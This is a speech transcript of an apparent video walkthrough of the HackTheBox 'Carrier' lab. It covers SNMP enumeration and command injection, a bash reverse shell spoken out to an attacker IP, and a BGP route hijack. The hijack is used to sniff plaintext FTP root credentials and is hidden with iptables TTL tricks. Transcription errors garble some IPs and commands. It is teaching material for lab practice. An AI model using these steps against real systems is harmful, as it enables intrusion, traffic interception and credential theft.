What's going on YouTube? This is Ips. I can be doing Carrier from HackTheBox, which was an amazing box because of the technologies it used and just the attack path. You start off by attacking an internet service provider's webpage that lands you on one of their routers. You then perform a BGP Border Gateway Protocol hijack to snoop in on some of their customers' data, which then gives you information to log into their server and get root. BGP hijacks are something you'll often read about because they've been used to steal data, they've hijacked the routing of mining pools to steal cryptocurrency, etc. But it's really hard to get that hands-on experience just because routers are generally tough to emulate and many people just don't have access to that type of command line interface. However, Snowscan did an amazing job setting this up, and if you just go in the box, you have pretty much free reign to do what you want, so let's just jump on in. As always, we begin with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it carrier, and then the IP address, which is 10.10.10.105. This can take some time to run, so I've already ran it. Looking at the results, we have 2 ports open and 1 port as filtered. FTP is the filtered port, so this just means that when we send a packet to 10.10.10.105 to port 21, the server does absolutely nothing with it. It can take 1 of 3 actions. It can either accept the packet, which I believe it sends a SYN-ACK back to us. It can reject the packet, which it sends a reset back to us, or it can drop it, which it means it just takes no action. So because this one port is configured uniquely, I'm going to guess there's an FTP service somewhere on this box and there's a IP tables rule to drop it to verify it is not accessible externally. So the next port we have is SSH on 22, and it is OpenSSH 7.6 Ubuntu 4, which I believe this is the Bionic Beaver, which is I think Ubuntu 18. So we can just Google Launchpad OpenSSH source and then go to the first link. This is /ubuntu/+source/OpenSSH, and this tells us the package name for all the Ubuntus. So we can look at Bionic Beaver. This is 176p1, and we have 76p1 there. So we know this is most likely going to be Bionic Beaver. And I think because it says 4, it's going to be the release main. So the next port we have is 80. This is HTTP, and it's running Apache HTTPD 2418. And just experience tells me this is Ubuntu Xennial. So we have a mismatch here, 2 different Ubuntus. So I'm guessing there's some type of virtualization technology. And we can verify this by just Googling the same thing essentially. So we can do Launchpad Apache 2 source and go to Ubuntu plus source Apache 2 and scroll down. We see 2418 is Xennial Xeris. If it was Bionic Beaver, it would have been 2429. So this is definitely a little bit unique. And I guess we're just going to start off by checking out what's on port 80 because we don't have anything else to do. So let's go to 10.10.10.105, and we just get a login prompt with 2 different error messages and Lightspeed in the title. So I'm going to Google Lightspeed. Was that LYGHT? That is LYGHT speed error 45007. See if this brings any results. And it does not look like it does. So this may be a custom application in which we should run GoBuster against it. I'm also going to do a UDP nmap scan, and this is something I normally do, but I just normally don't show it because, well, showing this in every video where it's not relevant wouldn't be that interesting. So I'm just going to do nmap-s capital U for UDP 10.10.10.105, and then -VVV to make this verbose. And that's just going to mean that whenever it discovers an open port, it's going to display it. So while that runs, let us also do a GoBuster. So GoBuster-H, and we're going to want to do -U for URL, HTTP 10.10.10.105, then -W for word list, user share word list, dirbuster directory list 2.3 medium, And I'm going to specify -T for threads and put it as 50. And -O for ALP file. We'll just do root normal, I guess, .log. And normal to me is going to be like directory list 2.3 medium. So we immediately have hits for tools, image, doc, CSS, JSS. So let's go over to /tools. And we just get remote.php. And it says license expired exiting. So nothing too interesting there. We could try fuzzing it and seeing if we could put any custom arguments in it. But let us now check over the doc thing to see if there's any documents. We also have debug, which is interesting. So let's go to /doc, and we get a diagram for TAC and error codes.pdf. So if we look at diagram, we just see what looks like to be 3 different routers, AS100, AS200, and AS300. So doesn't really mean too much, but I'm going to save this just in case we want to reference it later. So just do a wget against the image to save it. And then let's go look at the error codes. So going back to the home page, I think it was 45007 and 9. So 45007 means license expired, which happened when we hit remote.php. And 45009 means system credentials have not been set. Default admin user is set, and it is the chassis serial number. So we have to find a way to get the serial number of this chassis. So let's go over to /debug, see if anything is there. And I'm just going to Google search chassis or serial, and I don't really see anything. So this is when we go back and look at our other nmap and see if it has anything else. Does not look like it's come up with anything yet. So normally when I do boxes, I will do the nmap with a full port scan. So that would be nmap-p-, and I also do the -su to do UDP. So I just got to wait for this UDP scan to find an open port, and then we can begin because there's not much else we can do. I guess we could try to like Hydra this login page, but since we know the error message is saying system credentials are a serial number, I don't think Hydra is going to be too successful. So let's just, I guess, wait for nmap to finish. After like 15 minutes, this scan finally finished, and we have SNMP open. So I'm just going to test the default community string. So we'll do SNMPWalk-V for version 2C. Version 2C is the default. -C for community, public, this is the default community string. And then 10.10.10.105. And we do get an immediate hit, and it sends us a response back saying SN number net_45JDX23. I'm going to guess this is serial number, and then here we have the serial number. So I'm going to go back to the page and log in with admin and that serial number. Login passes, and we are greeted to the dashboard. It says the license is invalid, ticket functionality is set to read-only mode, monitoring functionality is disabled, yada yada yada. A contact sales button that goes nowhere. We can see it's just saying /dashboard.php and then the anchor tag. And then we have their motto, Lightspeed Networks, delivering 1 millisecond latency across the planet since 1994. And I bet physics will have a thing or two to say about that, because 1 millisecond latency is not possible across the planet. And that reminds me of a really funny story. If you Google, like, Solaris can't send email over 500 miles, you'll get to this thing from web.mit.edu, and it's absolutely hilarious about a sysadmin troubleshooting an email problem where his VIP couldn't send email over 500 miles. And if you know anything about networking, you may think that sounds asinine, but this is actually makes sense once you read the whole story. So definitely check that article out. But going on with the page, let's go check out this tickets page. We have a bunch of tickets and up until this ticket, there's nothing really too interesting. We have an update right here saying Castcom, and if we go back over to this diagram, we'll know Castcom looks like it's an ISP with the autonomous system number 300, and there's reporting issues with 3 networks, 10.120.15, 10.120.16, 10.120.17. They are all /24, so I'm guessing each one gets a .0, and one of their VIPs is having issues connecting by FTP to an important server in 10.120.15.0/24. So this is probably that FTP thing that we had saw on our nmap. They say no problems found, stuck routes and whatnot. We get this one about a Nigerian prince, and then ticket number 8 is saying something about testing BGP routes. So, and the quote of the day here is QoS is for poor people, which I find a hilarious quote. But let's go over to the diagnostic page, and this is where we have another warning saying the license is invalid and we should verify status. So clicking this verify status button, it looks like we're getting output where maybe it's from PS, because we see like a username, a PID, something, state of the thread, and then like the path. So I'm guessing this is PID, output of a PS command. So let's make sure burp intercept is on and go over to Foxy Proxy and make sure we use burp to intercept all URLs. Now click verify status, and going into burp, we see a check with some base 64. So, or we don't know that's base 64, but it looks like it to me. There's no equals on the end, but copying that, going over to the decoder tab and decoding it as base 64, we get Quagga. And looking at the page, every single line has Quagga, and if we Google, and I probably mispronouncing that, but Google Quagga Linux or something, let's see if we get anything. We get Quagga Software Routing Suite, which kind of makes sense with the tickets and all these AS numbers that we're dealing with some type of router. So let us see if we can inject anything into this. So I'm going to verify first that it is probably PS output. So I'm going to search for root, and this should show all the root processes. So let's convert this back to, encode this as base 64. Then we can copy this, go to the proxy tab. Let's send this to repeater, and then paste the base 64, and then highlight Control U to convert those equals to, I think that's URL encoding. Yeah, URL encoding, I think. Yep, Control U, URL encoding. So click go, scrolling down. If we want, we can make it a bit more pretty by doing render. And we can see this definitely is the output of PS, and this is probably a grep tag. So let's go back to the decoder and see if we can inject anything. So we're going to put a semicolon, echo, please subscribe. And if we see just please subscribe on the page, we know we have code execution. If we see echo, we may not. So let's see what it outputs back to us. Oh, I didn't mean to go back to the proxy tab. I wanted the repeater tab. Clicking go here. Waiting for the page to render. Go to the very bottom, and we have please subscribe, and we don't see any echo. So we definitely have code execution. Let's try a reverse shell. So I'm going to do bash-i. Then I think that's greater than ampersand dev TCP 10.10.14.3. Let's do port 9001. And then that's 0, that, and 1, I believe. And if you just Google, like, reverse shell cheat sheet, this is on the list. So I've just typed it enough where I have that string memorized. Let's convert this to URL. And we'll have to probably convert this plus, maybe? Maybe not. If it errors out, we'll know to convert it. So let's go back to a shell. Netcat listen on 9001. Click go. We don't get a immediate response back. That is a good sign, but we don't get a shell. So let's convert this as well. Click go. Don't get an immediate response. And this time we do get a shell. And the reason for that is plus in HTML just means space, or maybe plus in URL means space. Plus means space in some language. So this was really just translating it, and this plus this %2b was getting translated to a space, which breaks the base 64. So we had URL encoded it. So that's why that works. So now we get a shell, and it says root at R1, do a ls, we get a user.text and testintercept.pcap, and interesting that it says root. So this confirms a suspicion that we're probably in some type of container. Do ls-la, and we can see the testintercept.pcap is 0. I'm going to do a ls-la on slash to see if I find like a .dockerenv. I do not. And now I'm going to cat/proc1 environ. And we see the container equals LXC. So we're in a LXC container. So no Docker, just in LXC most likely. I'm going to do python-c import pty.spawn bin bash. And I forgot to do single quotes around this, so it'll probably error out. Looks like Python's not there. That's not the error I expected. So try which Python 3. Okay, Python 3 is on the box. So Python 3-c import pty.spawn bin bash. And then we can do Control-Z, stty raw, I forget this stty command. I think it's stty echo minus raw. Echo minus raw. Hit FG. Nope. stty raw minus echo. Hit FG, enter. And now we have like tab autocomplete and Control-C and things like that. So just makes the shell a bit better. Next thing we want to do is like export a terminal variable so we can do clear. So export term equals xterm, and now Control-L will clear the screen. So now it's safe to assume the game plan should involve some type of lateral movement, because we know we're running in an LXC container as root, and in/root is only user.text. So we know we've owned this castle, but our flag is in a different castle. Unfortunately, we don't know where that castle is. So we have to start surveying our land and see if we can find out where the next place to move is. So we should think all the way back to the Recon, and we had 2 ports open, 1 port as filtered. So let's see if that filtered port is now accessible, or we're on the host where that filtered port is. So to do that, we're just going to do a netstat-alnp and grep for list with all caps. I'm sure there's a more elegant way to do that, but this is just how I do it. And we see Zebra, BGPD as an SSH all listening. We don't see HTTP, which is a bit odd because we exported this box via HTTP. So most likely there's some type of service the website interacts with, which then we exploited and we landed in that container, not the one where HTTP was listening. The other thing we should start looking into is if the containers are Ubuntu Xenial, because we had a host mismatch when we did nmap 10.10.10.105. So I'm going to do cat etc lsb-release, and we see Xenial. So it's safe to say that probably the containers are going to be Ubuntu Xenial, and the host is going to be just Ubuntu Bionic. And we can confirm indeed that port 22 isn't going to this container by just doing like a SSH-key scan on localhost, and then doing that on 10.10.10.105. And what this is going to do is tell us the fingerprint for both of them, and if the fingerprints don't match, then it's a different service. So we see, let's see, SSH-RSA ends in BBD, and SSH-RSA ends in 9LJ. So indeed, 10.10.10.105 and the SSH service in a container are different. So let's take a look at the ARP table, and this is going to tell us boxes that are currently talking to the box we are on, and we have a few IP addresses. There's one last thing we should keep in mind when going back and looking at all the Recon, is if we go to a browser, go back to the tickets page, there was a ticket that says a very important FTP server is in 10.120.15.0, and we don't see that in the ARP table. So if we do ping 10.120.15.1, is it 15? Yes. 15.1. I'm assuming .1 is going to be a gateway, and it is. So we can get to that network. We just can't get to... Oh, we just don't know what the box is on that. So to find out what the box is, I'm just going to upload Nmap to this box. So let's go back to our host. I'm going to go to opt static binaries. And if you don't have this, just GitHub on static binaries. If I could type, that probably has a lot of typos. And then I think this is the exact repo I have cloned from. So if you just go there, I'm going to find dot and grep for nmap, and we're just going to upload this. So make dir HTTP boxes carrier dub, and then we're going to copy op static binaries and map to a directory, cd there, and do python-m simple HTTP server. And now we can download nmap. So let's check if curl is on the box. It is. So we curl 10.10.14.3 port 8000 nmap-o for out file nmap. Download that, and now we can start scanning away. So we wanted to do a nmap on 10.120.15. So let's do /nmap -p. Oh, we don't want to do ports yet. We'll just do 10.120.15.0/24. Actually, we will. If we're in a rush, we can just do -p21 and scan for FTP here. We may also want to do like -p21 if we're trying to be a little bit more quiet. So we don't do full port scans on everything because that is a little bit loud. So let's let this nmap... Oh, that was odd. UDP payloads are disabled. Cannot... Let's try that again. nmap -p 21 10.120.15.0/24. Let's do verbose so we can see as it discovers things. But I haven't seen that crash before. We can do actually -count pn to disable ICMP stuff, 10.120.15.0/24. And the reason why I'm doing that is because we see IP proto ICMP here and ICMP ID 206. And I have to do /. So I just disabled ICMP, hoping we can just skip over that error message. So I'm going to let... Oh, we don't even have to let it finish. It immediately told us one port was open. If we do the --open flag, we won't see all these filters. So we can see 10.120.15.10 does have FTP open. So if we tried to do netcat on that port, 21, we can see it's running VSFTPD 3.0.3, which I know is not a vulnerable version of VSFTP. We can try doing the FTP command there, check if anonymous login is enabled. It is. We can do dir, and we get illegal port command, address already in use. I'm not actually sure what that is. I've never actually logged in anonymously on this, so I don't know how it was configured, but that may be something to investigate. But we're just going to move on. And the other thing I wanted to take note of is when we did netstat ALNP, grep for listening, we saw a bunch of BGP, which is a networking protocol, and Zebra. If we do cron tab-L, we see there is a cron that runs every 10 minutes. So let's take a look at that. If we cat restore.sh, we can see it's killing a program called vtysh, stopping a service quagga, and then copying configs back over and then starting it. So let's look at exactly what these configs are to have an idea what this cron is doing. And we see Zebra configuration saved from VTY, and then it looks like a Cisco config file. There's another config file, so quagga BGP, cat this one, and we see a bunch of BGP commands with a BGP router ID, networks, neighbors. We do erp-an. Let's see, do any of these neighbors line up? 1078.10.2, and that is this neighbor. And we also see 11.2, which is this neighbor. If we run vtysh, we get access into the quagga router interface, which is very much like Cisco. So we can do like show running config and then print out the config that we see. So right now, it's kind of safe to say that we may have to do some type of BGP attack because, well, we see the BGP config. It reverts every 10 minutes. We have 3 different routers, so something's leaning towards a BGP hijack. One thing I just remembered was back in the documents directory, there was this diagram for TAC, which had Zazacom, Cascom, and Lightspeed networks. And based upon the config, we can probably find out what everything is. So I'm going to guess that we are AS100, Lightspeed networks, because this is the web page we exploited. Then we have AS200 at 1078.10.2. That is probably Zazacom. And then we have 1078.11.2 as AS300, which is Cascom. So let's put this diagram in something we can edit because chances are we're going to have to do this. Or at least map where hosts are. So I'm going to go to draw.io, which is kind of like a web version of Visio. And we can just save to device, create a new diagram. Basic should be fine. And I'm going to search for shapes, router, and then we're going to place 3 of them. So 1, 2, 3. And I guess I can make this bigger. So we need, this is going to be AS200. This is AS300. And this is the one we control. So let's see, is there a color? Background color? Red. That did nothing. AS100. See, can I change that here? I'm not sure exactly how to change the color, but AS100 we own. So we should also put links. Let's see if I get rid of that. Should be able to connect this. Connect this. I want this on the side. Oh well, that'll be fine. So let's change these lines to diagonals. Change this line. Man, Draw.io does not like the setup I have going on right now. See, can I change that font size? Let's see. Here it is. Okay. And then we can just change it to be these double lines. And then we need to add text. Where do I add text here? Oh, double click and it finally went through. This is 1078. What is it? 10.2. So we'll just do /30. I'm not sure if these are actually /30s, but for documentation purpose in this box, it should be fine. This is 11.0/30. So we need to figure out exactly where 10.120.15.12, or what was that IP? If we go back here, search for nmap, let's see, it is, where's host? 10.120.15.10. So we have to figure out where that box is. So I can just do a TraceRoute. We don't have TraceRoute, only TraceRoute 6. Let's go VTYSH, and we can do show route for this. Route map not found. Show IP route, that IP. And we can see routing entry for this guy is going to be out 10.78.11.2 via ETH2. So 10.78.11 is this link. So we can put the FTP server here. So let's put FTP, label this 10.120.15.10, and we can draw that link and change the line. Okay, we can also create us. So if we do attacker, or let's see, attack, this is oddly fitting. So this will be us. So as we're drawing this out, and we think that this is a BGP attack, we can assume there's probably going to be a link that goes here. And just thinking about it, I'm assuming someone's going to be sitting here. So we can do person. And we don't know who this is, but I'm guessing there's going to be a person here. And we probably have to take over this IP address, just knowing that the box is vulnerable and seeing how it is set up. So let's look at a bunch of BGP information. We can do show IP BGP summary and get information. If you don't know Cisco interfaces, or I say Cisco interfaces, probably got some name. You don't have to type the full command out. If I do start typing, I do tab, show works, or I can just leave it shorthand if this is the only one. I can also at any time hit question mark, and that's kind of like tab autocomplete. So show IP BGP summary. We can see neighbors, the time they've been up, and their numbers or routes. And think of AS numbers as the blocks of IPs, and it's how BGP routes. Think of them kind of like, I guess, host names or host groups. I don't know a good terminology, but they are definitely useful. If we do like ASN lookup, we can look at like, let's do Google. Google, go. Okay. So we can see Google has, let's do this AS number. And we can look up this ASN number. So if we do IP info ASN lookup, this is just the tool I like using. ipinfo.io. Let's see, ASN or ISP network. ipinfo.io, ASN. What's the exact page? We'll just go here. And then send this AS number. We see the lookup for Google. And this tells us the who is. Oh, there's no known IP ranges for this one. We picked a bad example. Let's do the block that contains 8.8.8.8, the infamous DNS server. I know this one will contain IP addresses of Google. So we can just search this. And we can see this was allocated back in 2000. It has 8 million IPs. And we can see various IP ranges assigned to this AS block. We can also get IPv6 ranges, which is definitely handy for enumerating IPv6 ranges of corporate networks. And we can see the peers of this AS, upstreams, downstreams, whatnot. But bunch of, I guess, carrier-grade routing. So you don't have to know that, but it is handy when building scopes for companies if you don't know what IP addresses they own. Maybe they have IPs registered to them that they forgot about that still point somewhere that is interesting. So definitely look up AS route numbers. I think that's autonomous system number. We can do show IP BGP and see all the routes. So let's say 10.1.20.15. This is advertised to us twice. That's why we don't see anything right here. This caret means it is the preferred route. And we can see it's routed directly to AS300. This route is going through 200, and 200 saying, I know how to get there, send it to me, then I'll send it to 300, and then I'm there. So that's kind of how to read this BGP routing thing. Let's see, what's another good command? We can do show IP BGP 10.120.15.0/24, and we can see more details about the advertisements. So we can see that 300's advertised from 11.2 and 10.2, and that's the path. And this one is preferred. We can also query a BGP router for their advertised routes. So if we do show IP BGP neighbors 10.78.10.2 ADV and then hit tab, it'll say advertised routes, and we can see the routes this guy advertises. So the ones with a path question mark, these are locally connected interfaces, and then these are BGP routes it knows. So what we want to do is go back to draw.io, and we want to advertise a BGP route for this guy. So that's relatively simple, and BGP is all like policy based. There's not much actual technical things preventing people from doing bad things. So there is a Twitter that shows like BGP hijack. So if we do Twitter BGP hijack, is it BGP stream? Is this it? That shows a bunch of interesting things because this hijacks happen by mistake all the time of people just screwing up BGP. Additionally, there have been actual attacks. I think my favorite one to read about is someone hijacking a BGP of a known Bitcoin miner group and then stealing their traffic and doing something. That's a fun read as well. If you just Google like BGP Bitcoin mining hijack, you should find it. But let's begin with hijacking this route. So before I do anything, I'm going to move restore.sh to restore2.sh because I don't want this, is it cron-l? Cron tab-l. I don't want this cron executing, then killing my shell, reverting everything. So I just disable the machine's self-recovery feature. And let's do vtysh. And we have to enter configure mode. So configure T, or you'll see me type conf T a lot to do that because that's the shorthand. So we have to advertise that route. So we're going to do router, or before we do this, if you're in configure mode and you want to run a non-config command, just prepend do. You can do like do show run. So what I want to do is go into this code block and advertise a BGP route for 10.120.15.0. So we'll do router BGP 100. So now I'm in this config block, and I'm going to do network 10.120.15.0. And the advertised route was a /24 from AS200. I'm going to do a/25 because normally in networking, the most specific match wins. And /24 means this IP can be 0 to 255. A /25 takes away 1 bit, and this can be 0 through 127. So I'm advertising a more specific route, which means I should be preferred. And then we have to, I think that may be it. So let's do clear IP BGP star out, I think. And this is just going to clear our routes and re-advertise everything. So if we do show IP BGP 10.120.15.0/25, we can see we are advertising it to 1078.10.2, 1078.11.2, and if we do show IP BGP neighbors 1078.10.2, that is going to be this guy, AS200, and then select advertised routes. We can see he is also advertising a route. So we know we have successfully pushed this route. So what we can do is exit out of here, do a TCP dump. So we can do TCP dump -I any for interface any, and then do -W for write. We'll do FTP-1.cap. What else do we want to do? Port 21. I'm only interested in that traffic. So I'm going to let this run. Did I screw something up? TCP dump. Okay. TCP dump -I any. Okay. Dump -I any -W. Oh, I may not be able to write to /opt. Let's put it in root and rerun this command. So copy, paste. There we go. So I'm going to let this go for about a minute or two just so we make sure we get a packet, and then we will analyze it. So I'm going to press Control-C to kill this TCP dump, do ls-la. We can see, let's see, FTP1.cap does have some stuff. So let's do base64 on that file. If I can type that correctly. And we get a bunch of data. That is more than I expected. So copy all this. And then let's send it over. So let's do make the pcaps, go in there, vftp-1.pcap, or cap we called it. And I want .b64. And paste it, base64-d on this file. And then let's open in Wireshark. Let's open Wireshark. I don't want that full screen. File open. FTP1.cap. And let's just do this. Oh, I thought that would have got my Wireshark screen. Let me do this something. I lost my terminal. Everything hung. Wow. Which, please subscribe. This is just a quick file I had wrote to do some things. I'm hoping to grab. There we go. Now I can click. And let's see. Firefox Windows, or Wireshark's window name is FTP. So this is how I always get all the terminals the correct size because I got tired of dragging them around. So there we go. So we can indeed see that we are getting packets, FTP packets from 1078.10.2 to destination 10.120.15.10, but we're never completing the handshake. So what's happening is this actor is sending us the packet. We're getting the packet, And then let's see. Oh, we're getting the packet. We're probably sending it to AS300, which it got the route, the BGP route, saying we own it. So it either sends the packet back to us or it's sending it to AS200 then back to us. Because if we look at, if we go here, let's go back to the box, VTYSH, and do show IP BGP neighbors 1078.11.2, advertised routes. We can see he's advertising the route to 11.1. So he's sending it. It's the packet's getting here. Packet's going to us, which we want. That's why we see this in. Then it's going back down here because we're sending it off saying we think that's down here. This guy's looking at his routing table and then sending it right back to us. So that's not good. We can also confirm that with a ping. So let's do that same Wireshark. So we'll do no hup to background this TCP dump. TCP dump -I any -w ICMP .cap. And I'll just background this with and. And then we can just ping 10.120.15.10. Let's just do ping -C1. So we send one ping to that IP address. And let this time out maybe. There we go. And now I'm going to run a pkill on TCP dump to kill it. ps-ef grep TCP dump. Kill 61064. And now let's base 64 that ICMP capture. That's huge. Let's do TCP dump again. And let's say no hup, not port 22. And I'm guessing that's big because of our SSH capture. So ps-ef grep TCP dump. Verify we are running it. Ping 10.120.15.10. Forgot the -C1 again. Okay. Kill the TCP dump 61070. Base 64 ICMP.cap. ICMP. Let's just take this and see what's in it. Maybe -W didn't overwrite it. Something happened. And I really don't want to copy that on my terminal. Remove ICMP.cap and run this again. No hup, TCP dump, any ICMP.cap, port not 22. I wonder if I did port 22 and not, is it not port 22? I think I typed port 22 and only captured it. And that time I did not background no hup, so delete the file. Background no hup. I swear I'm going to get this right eventually. Ping 10.120.15.10. Forgot the -1, but we'll just let that slide. Okay, we sent 5 pings. pkill TCP dump. TCP dump has been killed. Base 64 ICMP.cap. Okay, I have no idea why we're getting so much traffic. It probably has to do with the fact I'm not SSH'd in, so it's not over port 22. It's probably over like port 80 or something. Hindsight's 2020. CDP caps v ICMP.cap. Probably should just put like ICMP in the filter for TCP dump and see if it grabs that. So that was probably the smarter way to go about that. Open. It's not in a format Wireshark understands. Because I didn't base 64 decode it. It's been one of those videos, I guess, now. File open. Okay. ICMP. There we go. This is what I wanted to see. So, send. It'd be nice if we only did one ping. So let's see, a TTL 64 here. So I'm guessing it's the first 4 packets. My clicking's not working fast right now. Or I can't highlight multiple packets. But here we go. We send a ping request from 1078.11.1 to 10.120.15.10. We're getting a ping packet from 1078.11.2. And we're also getting a packet, a redirect from 11.1 to us. And let's see. Yeah, we can see the TTL keeps decrementing. So 64, 63, 62 comes from us, comes from 11.2, goes from us, goes back to 11.2. So we can kind of see a loop of that ping packet just traveling between these two. So what we want to do is cut off this route. So we don't want to advertise a BGP route to that guy. So let's see. Can I do this? Yes. This is what we want to do. Cut off that route and not advertise our packet. So hopefully that routing loop made sense and how we figured it out, because I thought it would be easier to explain than I actually did a job of it. So what we want to do is go back in VTYSH, conf t, and in order to block a route, we need to add it to the route map. So this route map to ASA 200 permit 10. This means advertise routes to AS10 or AS200 permit, and then 10 is the line number. And it can go like 0 to 999 or something. But with nothing there, we're permitting everything. It's got a blanket permit all at the very bottom. So what we want to do is go into AS300, put a deny, and put our subnet in the deny route. So we're not advertising it to AS300. So to do that, we're in config mode. We need to create a IP prefix. So that's IP prefix list. We'll call this please subscribe. We'll call this, yeah, please subscribe. It's fine. And we permit 10.120.15.0/25. This is the subnet we're advertising. So we can do route map to AS300 question mark deny, and we'll do 5. So now we created a new code block right here that's to AS300 deny 5, and we want to add logic that blocks our route. So we'll do match IP address that is in prefix list. Please subscribe. So prefix list, if we do question mark, we can only do words. If we do match IP address, we got access list number, extended access list, words, or prefix. We don't have IP address. So that's why we created that prefix list first. So this is essentially just mapping a name to IP address. So we're saying any IP address in this please subscribe prefix list, deny. So if we do show run, we can see route map to AS300 deny 5, match IP address, prefix list, please subscribe. That goes up here and to this. This permit doesn't matter because the deny is here. So we can just get out of config mode and do a clear IP BGP star out. And then we can try to ping. Can I ping from in here? I can. 10.120.15.10. And we're not getting a ping. So if we wanted to, we could go back in TCP dump. And this time I'll do it correctly. TCP dump -I any -w ICMP -2.out. ICMP, so we're filtering only on ICMP packets. And that should be good. ps-ef grep for TCP dump. We are running it. So ping-c 10.120.15.10. We've got the 1. Sent that 1 ping packet. Now we can base 64 ICMP-2.out ls-la ls-la/root. It didn't write any data. So I was wrong when I said I was going to get it right. Let's just do no hup and then TCP dump -i any. And we'll do -w ICMP-2.out and capturing all traffic. We'll just get a big capture of that file. That's fine. 10.120.15.10. One day I'll remember -c1. Okay, base 64 ICMP2, and let's copy this. Go back, v ICMP-2.out.b64, paste, base 64-d, and undo this. Go into Wireshark, Control O to open, and I'm not in pcaps. Move ICMP-2.out to pcaps. Now we should be able to open this. And looking at ICMP, we send a ping request, and now we're getting it from 12.2. If we remember the last one, we still got it from 11.2, I believe. So let's do Control O to open a previous one. And we can see the TTL mysteriously went from 64 to 62. So let's look at the first ICMP capture. And we see we don't have any TTLs jumping. We have 64, 63, 62, and we're getting it from 11.2. So what happened is, if we look at this, we sent the ping packet, we go to AS300, because we're just not advertising the route to it. We still know the route is to it, if that makes sense. So it just doesn't know to come back to us. So we sent the ping packet to it. It looks at its routing table and decided to send it to AS200. So what happened is we advertised the route 10.120.15.10 to both of these, and AS200 decided to advertise it to AS300. If you remember when we first were looking at routes, VTYSH, show IP BGP, is it route? Can I do that? Show IP route 10, show IP BGP 10.120.15.0/25. No route there. That is us. So we can see we're just advertising to 10.78.1.2, 10.2. But if we look at 120.15.0/24, we see the guy actually, we got two advertisements. One was 300, one was from 200, 300. And when I say 200, 300, I mean AS200, AS300. So what happened was we essentially killed this guy, but there was still a backup route of this AS route. So send a ping packet, this guy's saying, okay, to get to 10.120.15.10, I have to go through AS200, then AS100. So we sent the packet here, and then it came back to us. So 64 TTL, 63 TTL, 62 TTL, and it gets back to us. Every time a packet jumps a router, the TTL decrements. That is time to live. When the time to live gets to 0, the packet just dies. So what we have to do is say, okay, don't advertise or hijack route to AS300, but when we advertise it to AS200, tell him do not advertise it to anyone. So now we're going to have 2 blocks on that. And then if we do that, we should be able to get the packet how it's supposed to go. So hopefully this is all making sense. So VTY.sh, I'm already in it. I can just do show run. So we have to edit, go into this code block, put a match, and then tell it to not export. So I'm going to do conf t to enter config mode, route map to AS200, permit, and I'm going to put it in code block 5. This can be 1 to 65,535. And it goes in order, so 0, 1, 2, 3, 4, 5. Whatever is the lower number takes precedence. So it's a good thing when doing these to keep them in decrements of or increments of 5 or whatever, because if I started a rule at 1 and I wouldn't put something before it, I'm kind of screwed, and it's a pain to reorder rules. So you do the first rule at like 10, the second rule at 20, and then that gives you some leeway to modify them or put things before or after. So now we're here. We want to do match IP address prefix list. Please subscribe. And then we want to do set community. Yes, I'm in the correct thing. And then no-export. And no-export is going to tell us, or tell it not to advertise it. So we can do end to get out of configuration mode, and then clear IP BGP star out. And now if we ping 10.120.15.10, we should get to it. Maybe not. What did we screw up? Ah, there we go. It just took a while for the BGP advertisement to go through. But now we can ping 10.120.15.10. So all the routing is good. So let's do no-hup TCP dump -w for, we'll do -ini -w for file. Let's do FTP-2.cap. And we can do port 21. I don't know why I backgrounded it, but we'll kill TCP dump in about 1 minute. So we have enough time where that client should have sent the FTP commands. So we can pkill TCP dump. It did not die. ps-ef grep TCP dump. And we have a lot of TCP dumps running. Kill, we'll do pkill-f TCP dump. Okay, they all died. So let's do base 64 on FTP-2.cap. Whoops, copied way too much. Let's go here, set edit mode, go down, copy. We can do vi ftp2.cap.b64, paste, base64-d2, ftp2 There we go. Control O to open. And I'm guessing I'm not in the correct directory. I am not. Move FTP2 to pcaps. So if we open this, get rid of our ICMP filter, and we actually see FTPs. We see a lot of duplicate packets. That's probably because we're on any interface. If we just specify interface probably 1, we wouldn't get those, but if we just go to a TCP packet and do follow, or we can't even follow stream. Or my GUI's lagging. Let's see, can we? Follow, TCP stream. We can see the traffic of the user, trying to FTP with root, and the password of BGP telco routing. So if we FTP 10.120.15.10, oh, we have to do it from this guy. So FTP 10.120.15.10, root, password's BGP telco, with success. Oh, maybe we have to go active mode, maybe? Mode active. Only support stream. We can try SSHing with this. So let's just do SSH root at 10.120.15.10. And come on. Let's see, is wget here? It is, so we can try like wget -m FTP root password at 10.120.15.10. See if wget works. Wget works. So we can go in the file. We got root.txt. We also got .ssh and authorized keys. And if I'm doing this, I can't do 10.120.15.10 because I don't route to that. We have to do 10.10.10.105 password, and we're logged in. So let us first clear that pane. And let's see, we can do LXC list to show VMs, and we see all 3 routers. So let's do something fun. So let's go create 3 sessions to this. So 10.10.10.105, paste. Did I click? I did click on something. Wireshark has it. And I closed Wireshark. Strings, FTP 2, grep-i BGP. There we go. So let's SSH 10.10.10.105. SSH 10.10.10.105. And I want to get into all 3 routers. So we can do LXC exec, and then R1. We'll do R2 first. Wait. Oh. LXC exec R2 bash. There we go. LXC exec R3 bash. And I wanted R1 at the bottom because I want this to be the bigger pane. So LXC exec R1 bash. So now we got all 3 routers. So we can see exactly what is happening. So we can do VTYSH, VTYSH, VTYSH. Actually, I don't want to do this yet. My bad. Let's exit out of all this. So, router 1, router 2, router 3. I want to go from this guy and ping 10.120.15.10. So let's go ping 10.120.15.10. And we can see we're getting a TTL of 62 back. So this is kind of indication that the BGP hijack's happening, because we'd expect a TTL of 63 if we know the route, because it decrements here, and that's it. So 62 means we're going through 2 hops. We can do TraceRoute, so 10.120.15.10, and we can see the box. So if I do iptables-t mangle-a pre-routing -i eth2 -j ttl increment 1. So what this did was just say, okay, every time router 1 receives a packet, increment that TTL by 1, so when the system decrements it by 1, it does nothing. So if I do a ping 10.120.15.10, we're now getting the TTL of 63. If we do TraceRoute 10.120.15.10, we still see my box because it's actually not documenting the TTL everywhere. If we wanted to, we could do iptables mangle a pre-routing, because we just did the TTL on this guy. We want to do the TTL here. So if we do, I wonder if I do this. If I do mangle -f, did that clear everything? -- flush. iptables save. Okay, I don't have any mangle routes left. So 10, 120, 15, 10. So it's back to 62. So if instead of ETH2, which is this interface, I apply that TTL increment to this interface. Let's see what happens. iptables -t mangle a pre-routing I ETH1 j TTL TTL increment 1 ping 10 120 15 10 and TraceRoute 10 120 15 10. We see I became invisible and the TTL is still lowered by 1. So this is definitely really bizarre because I'm pinging this with my starting TTL of 64. I'm getting a TTL of 62 back, and I'm looking at TraceRoute, and I'm not getting anything. It's only showing me 2 hops. So that is definitely bizarre. So if we wanted to do the perfect man in the middle, we could do ETH2 j TTL TTL increment 1. And now if we ping 10 120 15 10, we get the TTL of 63. And we also 